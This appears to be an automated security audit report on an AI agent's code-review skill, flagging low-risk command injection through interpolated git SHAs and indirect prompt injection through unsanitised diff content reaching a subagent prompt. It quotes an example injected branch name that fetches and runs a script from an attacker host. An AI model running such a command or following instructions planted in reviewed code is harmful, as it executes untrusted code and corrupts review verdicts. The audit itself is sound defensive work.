requesting-code-review

Pass

Audited by Gen Agent Trust Hub on Feb 17, 2026

Risk Level: SAFE (findings: COMMAND_EXECUTION, PROMPT_INJECTION)
Full Analysis
  • [COMMAND_EXECUTION] (LOW): The template in code-reviewer.md uses shell interpolation for {BASE_SHA} and {HEAD_SHA} within git diff commands. While typically safe when derived from local git rev-parse as shown in the examples, an adversary providing a malicious branch name (e.g., main; curl attacker.com | bash) could theoretically trigger command injection if the agent does not validate the input.
  • [PROMPT_INJECTION] (LOW): The skill is susceptible to Indirect Prompt Injection (Category 8). Evidence:
    1. Ingestion points: Untrusted data enters via {WHAT_WAS_IMPLEMENTED}, {PLAN_OR_REQUIREMENTS}, and the output of git diff in code-reviewer.md.
    2. Boundary markers: Absent; the template uses standard markdown headers without explicit delimiters or instructions to ignore embedded commands.
    3. Capability inventory: The agent can execute shell commands (git) and provide subjective assessments.
    4. Sanitization: None; external content is interpolated directly into the subagent prompt.
    Malicious comments in the reviewed code could attempt to manipulate the review verdict.
  • [DATA_EXPOSURE] (SAFE): Git history and file access are limited to local repository operations necessary for code review. No exfiltration patterns to non-whitelisted domains were detected.
Audit Metadata
  • Risk Level: SAFE
  • Analyzed: Feb 17, 2026, 06:50 PM